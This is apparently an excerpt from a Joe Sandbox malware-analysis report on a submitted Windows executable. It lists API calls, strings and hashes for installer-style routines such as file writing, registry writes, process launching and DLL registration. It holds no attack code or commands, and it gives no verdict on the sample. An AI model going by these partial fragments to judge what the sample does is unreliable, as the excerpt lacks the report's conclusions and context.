                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429574,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429574,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
